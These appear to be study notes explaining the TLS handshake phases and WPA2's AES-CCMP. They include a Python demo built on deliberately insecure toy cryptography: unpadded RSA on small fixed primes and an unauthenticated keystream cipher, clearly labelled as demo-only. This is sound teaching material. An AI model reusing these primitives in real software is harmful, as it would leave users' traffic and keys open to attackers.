Once the connection is established, both parties can use the agreed algorithm and keys to securely send messages to each other. We will break the handshake up into 3 main phases: Hello, Certificate Exchange and Key Exchange.

1. Hello - The handshake begins with the client sending a ClientHello message. This contains all the information the server needs in order to connect to the client via SSL, including the various cipher suites and maximum SSL version that it supports. The server responds with a ServerHello, which contains similar information required by the client, including a decision based on the client's preferences about which cipher suite and version of SSL will be used.

2. Certificate Exchange - Now that contact has been established, the server has to prove its identity to the client. This is achieved using its SSL certificate, which is a very tiny bit like its passport. An SSL certificate contains various pieces of data, including the name of the owner, the property (eg. domain) it is attached to, the certificate's public key, the digital signature and information about the certificate's validity dates. The client checks that it either implicitly trusts the certificate, or that it is verified and trusted by one of several Certificate Authorities (CAs) that it also implicitly trusts. Much more about this shortly. Note that the server is also allowed to require a certificate to prove the client's identity, but this typically only happens in very sensitive applications.

3. Key Exchange - The encryption of the actual message data exchanged by the client and server will be done using a symmetric algorithm, the exact nature of which was already agreed during the Hello phase. A symmetric algorithm uses a single key for both encryption and decryption, in contrast to asymmetric algorithms that require a public/private key pair. Both parties need to agree on this single, symmetric key, a process that is accomplished securely using asymmetric encryption and the server's public/private keys.

The client generates a random key to be used for the main, symmetric algorithm. It encrypts it using an algorithm also agreed upon during the Hello phase, and the server's public key (found on its SSL certificate). It sends this encrypted key to the server, where it is decrypted using the server's private key, and the interesting parts of the handshake are complete. The parties are sufficiently happy that they are talking to the right person, and have secretly agreed on a key to symmetrically encrypt the data that they are about to send each other. HTTP requests and responses can now be sent by forming a plaintext message and then encrypting and sending it. The other party is the only one who knows how to decrypt this message, and a MAC on every record lets it detect tampering, so Man In The Middle attackers are unable to read or modify any requests that they may intercept.

One caveat to this description: it is the RSA key exchange. Because the symmetric key is encrypted under the server's long-term key, anyone who later obtains that private key can decrypt recorded traffic (no forward secrecy). Modern deployments and TLS 1.3 use an ephemeral (EC)DHE exchange instead, with the server's certificate key used only to sign the handshake.
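The three phases above, run end to end in code, as an added example that serves this section and also Part 2 questions (1) asymmetric cryptography and (9) RSA digital signatures; it is not code from the original notes or from the article they quote. The RSA is the textbook operation on fixed Mersenne primes with no padding (an assumption to keep the example self-contained; real TLS uses 2048-bit or larger keys with OAEP/PSS padding), the "CA" is a second toy key pair, the TLS PRF is replaced by HMAC, and the record cipher is an HMAC-SHA256 keystream standing in for AES. The transcript the function returns is exactly what a passive attacker sees.

```python
import hashlib
import hmac
import os

# --- Textbook RSA on fixed Mersenne primes (demo only, unpadded) ----------------
def rsa_keypair(p, q, e=65537):
    n = p * q
    return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))          # (public, private)

def rsa_encrypt(pub, m):   n, e = pub;  return pow(m, e, n)    # anyone -> key holder
def rsa_decrypt(priv, c):  n, d = priv; return pow(c, d, n)
def rsa_sign(priv, h):     n, d = priv; return pow(h, d, n)    # key holder -> anyone
def rsa_verify(pub, h, s): n, e = pub;  return pow(s, e, n) == h

CA_PUB, CA_PRIV = rsa_keypair((1 << 107) - 1, (1 << 127) - 1)          # ~234-bit modulus
SERVER_PUB, SERVER_PRIV = rsa_keypair((1 << 61) - 1, (1 << 89) - 1)    # ~150-bit modulus

# --- Certificates: the CA binds a name to a public key with its signature ---------
def tbs_digest(cert):
    tbs = {k: v for k, v in cert.items() if k != "signature"}
    digest = hashlib.sha256(repr(sorted(tbs.items())).encode()).digest()
    return int.from_bytes(digest[:28], "big")                  # 224 bits, below the CA modulus

def issue_cert(ca_priv, subject, pub):
    cert = {"subject": subject, "public_key": pub}
    cert["signature"] = rsa_sign(ca_priv, tbs_digest(cert))
    return cert

def cert_trusted(cert, ca_pub, hostname):
    return cert["subject"] == hostname and rsa_verify(ca_pub, tbs_digest(cert), cert["signature"])

# --- Symmetric side: key derivation and a toy record cipher ----------------------
def derive_key(premaster, client_random, server_random):
    """Stand-in for the TLS PRF: the shared secret mixed with both Hello randoms."""
    return hmac.new(premaster.to_bytes(16, "big"), client_random + server_random, hashlib.sha256).digest()

def stream_xor(key, nonce, data):
    """Toy cipher: HMAC-SHA256 keystream in counter mode (demo only, no record MAC)."""
    out = bytearray()
    for i in range(0, len(data), 32):
        ks = hmac.new(key, nonce + (i // 32).to_bytes(4, "big"), hashlib.sha256).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], ks))
    return bytes(out)

# --- The handshake, phase by phase ----------------------------------------------
def handshake(server_cert, server_priv, ca_pub, hostname="example.com"):
    """Returns (client_key, server_key, transcript). Raises if the certificate fails."""
    transcript = []
    # 1. Hello: versions, cipher suites, and a fresh random from each side
    client_hello = {"max_version": "TLS 1.2", "cipher_suites": ["TLS_RSA_WITH_AES_128_CBC_SHA"],
                    "random": os.urandom(32)}
    server_hello = {"version": "TLS 1.2", "cipher_suite": client_hello["cipher_suites"][0],
                    "random": os.urandom(32)}
    transcript += [("ClientHello", client_hello), ("ServerHello", server_hello)]
    # 2. Certificate exchange: the client checks the chain before using the key
    transcript.append(("Certificate", server_cert))
    if not cert_trusted(server_cert, ca_pub, hostname):
        raise ValueError("certificate not trusted for " + hostname)
    # 3. Key exchange: client picks the premaster secret, encrypts it to the server's public key
    premaster = int.from_bytes(os.urandom(16), "big")
    encrypted_premaster = rsa_encrypt(server_cert["public_key"], premaster)
    transcript.append(("ClientKeyExchange", encrypted_premaster))
    client_key = derive_key(premaster, client_hello["random"], server_hello["random"])
    # Server side: only the private-key holder can recover the premaster and reach the same key
    server_key = derive_key(rsa_decrypt(server_priv, encrypted_premaster),
                            client_hello["random"], server_hello["random"])
    return client_key, server_key, transcript

def https_roundtrip():
    """Plain HTTP inside the tunnel; returns (keys match, decrypts back, wire is ciphertext)."""
    cert = issue_cert(CA_PRIV, "example.com", SERVER_PUB)
    ck, sk, _ = handshake(cert, SERVER_PRIV, CA_PUB)
    request = b"GET / HTTP/1.1\r\nHost: example.com\r\n\r\n"
    wire = stream_xor(ck, b"c2s", request)
    return ck == sk, stream_xor(sk, b"c2s", wire) == request, wire != request

def mitm_attempt():
    """Attacker presents a certificate for example.com signed by his own key: rejected in phase 2."""
    att_pub, att_priv = rsa_keypair((1 << 31) - 1, (1 << 61) - 1)
    forged = issue_cert(att_priv, "example.com", att_pub)
    try:
        handshake(forged, att_priv, CA_PUB)
        return False
    except ValueError:
        return True

if __name__ == "__main__":
    print("roundtrip:", https_roundtrip(), "mitm rejected:", mitm_attempt())
```

The transcript contains the premaster only as `ClientKeyExchange` ciphertext, which is the sense in which an eavesdropper who sees every message still learns nothing; the trust check in phase 2 is the only thing stopping a man in the middle from substituting a key pair he holds, which is why certificate validation errors must never be clicked through.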

AES and Wi-fi Protected Access

WPA2 replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it includes mandatory support for CCMP, an AES-based encryption mode with strong security. Certification began in September 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark.

CCMP (CTR mode with CBC-MAC Protocol)

The protocol used by WPA2, based on the Advanced Encryption Standard (AES) cipher along with strong message authenticity and integrity checking that is significantly stronger in protection for both privacy and integrity than the RC4-based TKIP used by WPA. Among its informal names are "AES" and "AES-CCMP". According to the 802.11n specification, this encryption protocol must be used to achieve the fast 802.11n high bitrate schemes, though not all implementations enforce this. Otherwise, the data rate will not exceed 54 Mbit/s.
